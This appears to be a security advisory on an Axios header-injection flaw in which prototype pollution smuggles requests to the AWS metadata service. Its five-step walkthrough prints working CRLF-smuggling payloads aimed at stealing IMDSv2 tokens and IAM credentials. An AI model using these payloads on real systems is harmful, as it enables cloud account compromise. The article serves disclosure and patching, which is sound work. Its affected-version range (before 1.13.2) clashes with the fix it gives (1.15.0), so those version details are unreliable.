Axios Critical Vulnerability Enables Full Cloud Compromise via Prototype Pollution Gadget

Axios, a widely used JavaScript HTTP client, is reporting a critical security flaw that could lead to full cloud environment takeovers. The vulnerability is caused by a lack of header sanitization and default Server-Side Request Forgery (SSRF) capabilities. The issue is dangerous because it requires no direct user input to trigger, instead acting as a 'gadget' that uses existing prototype pollution in other dependencies within the application stack.

Vulnerabilities summary:

The flaw is tracked as CVE-2026-40175 (CVSS score 10.0) - A request smuggling and header injection vulnerability in the Axios HTTP adapter that occurs when merging configuration properties from a polluted global object prototype. Attackers can use prototype pollution in third-party libraries like qs or body-parser to inject CRLF characters into Axios headers, allowing them to smuggle unauthorized HTTP requests. This mechanism enables the bypass of security controls like AWS IMDSv2 to exfiltrate steal cloud metadata and IAM credentials.

A successful exploit allows attackers to move from a compromised application state to internal infrastructure. By smuggling a PUT request to the AWS Metadata Service (169.254.169.254), an attacker can get a session token and steal IAM credentials, effectively compromising the entire cloud account. 

Here's a walkthrough with concrete payloads showing exactly what the attacker sends and what happens at each step.

Exploit example

Step 1 — The attacker sends a polluting payload. Suppose the application uses a vulnerable version of qs to parse query strings. The attacker sends a request like:

GET /search?__proto__[x-amz-target]=dummy%0d%0a%0d%0aPUT%20/latest/api/token%20HTTP/1.1%0d%0aHost:%20169.254.169.254%0d%0aX-aws-ec2-metadata-token-ttl-seconds:%2021600%0d%0a%0d%0aGET%20/ignore

When qs parses this, it sets the property directly on Object.prototype:

Object.prototype['x-amz-target'] = 
  "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";

At this point, every object in the application now inherits this property.

Step 2 — Axios prepares a normal request. Somewhere in the application, a completely innocent call fires:

await axios.get('https://analytics.internal/pings');

Internally, Axios builds its config by merging defaults, instance config, and per-request config. During this merge, it iterates over properties — and because x-amz-target now exists on Object.prototype, Axios picks it up as though it were a legitimate header:

// What Axios sees internally after merging: {   method: 'GET',   url: 'https://analytics.internal/pings',   headers: {     'Accept': 'application/json',     'User-Agent': 'axios/1.x',     'x-amz-target': 'dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\n...'   } }

Step 3 — Axios writes the raw bytes to the socket. Because Axios does not validate header values for CRLF characters, it writes the following directly onto the wire:

GET /pings HTTP/1.1 Host: analytics.internal Accept: application/json User-Agent: axios/1.x x-amz-target: dummy  PUT /latest/api/token HTTP/1.1 Host: 169.254.169.254 X-aws-ec2-metadata-token-ttl-seconds: 21600  GET /ignore HTTP/1.1

The \r\n\r\n after dummy terminates the first request's headers and body. Everything that follows is interpreted as a completely separate HTTP request by the receiving server or any intermediary proxy.

Step 4 — The AWS metadata service responds to the smuggled request. The second request is a valid IMDSv2 token request. The metadata service at 169.254.169.254 processes it and returns:

HTTP/1.1 200 OK Content-Type: text/plain x-aws-ec2-metadata-token: AQAEAHjQ3Nym4x7K...truncated...

Step 5 — The attacker uses the token to steal credentials. With the IMDSv2 token captured, the attacker can now send follow-up requests (using the same smuggling technique or a direct SSRF) to retrieve the IAM role credentials.

The vulnerability affects all versions of Axios from the 0.x branch through versions prior to 1.13.2. This discovery followed a security audit started after a recent supply chain attack targeting the library's maintainer, Jason Saayman. Estimates suggest over 48,000 instances may be directly exposed to remote exploitation, though active attacks using this specific gadget have not yet been confirmed in the wild.

Organizations must update Axios to version 1.15.0 or later to fix the flaw. The patch adds validation in lib/adapters/http.js and xhr.js that stops the process if header values contain invalid CRLF characters. Developers should also check their entire dependency tree for prototype pollution vulnerabilities in libraries such as minimist, ini, and qs to remove the starting point for this attack chain.